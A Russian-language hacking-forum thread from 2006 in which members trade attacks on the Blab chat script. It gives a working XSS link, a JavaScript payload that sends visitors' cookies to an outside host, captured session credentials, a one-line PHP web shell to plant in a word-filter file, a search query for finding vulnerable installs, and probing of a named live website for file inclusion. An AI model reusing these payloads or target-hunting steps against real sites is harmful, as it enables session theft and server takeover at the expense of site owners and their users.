Чаты Blab chat Active XSS

Discussion in 'Веб-уязвимости' started by TANZWUT, 31 Oct 2006.

  1. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    решил поковыряца, под руками была только версия 3,3, думаю слипу интересно будет
    http://localhost/chat/info.php?reason=<script%20src=http://localhost/s.js></script>

    s.js

    PHP:
    img = new Image(); img.src "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;
    PHP:
    REFERER=http://localhost/chat/info.php?reason=%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%2F%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
        
    QUERY=blab_id=1-bb2e48de1ba9a89497564acb9b584cc4blab_pass=813dfe9bd7b89fbcc5fd29d2be091bacblab_lang=9blab_time=3
        AGENT
    =Mozilla/4.0 (compatibleMSIE 6.0Windows NT 5.2Win64x64SV1)
    + с правами админа можно сдампить БД юзеров,
    при наличии локального инклуда на сайте
    в badwords.txt можно безпалевно вписать
    PHP:
    <?php system($_GET[cmd]); ?> 
    - админ этого неувидит, а так же с обычными правами можно загрузить картинку с шелл кодом.
    гугл inurl:"info.php?reason=link"
     
    _________________________
    2 people like this.
  2. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Отлично поработал:) Если есть чат на примете, в онлайне, кинь ссылку. А то через денвер в лом искать. Буду пробовать ещё что то сделать:)
     
  3. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    Определение версии чата

    в самом низу
    гугл inurl:"info.php?reason=link"

    Определение версии чата - _http://www.host.ru/chat/version
     
    _________________________
    #3 TANZWUT, 31 Oct 2006
    Last edited: 31 Oct 2006
    1 person likes this.
  4. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Вот вам и такое=)
    http://www.sisak.info/index.php?p=
     
  5. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    фильтруются символы ".." и "/"
    путь /home/sisak/public_html/
     
    _________________________
    #5 TANZWUT, 31 Oct 2006
    Last edited: 31 Oct 2006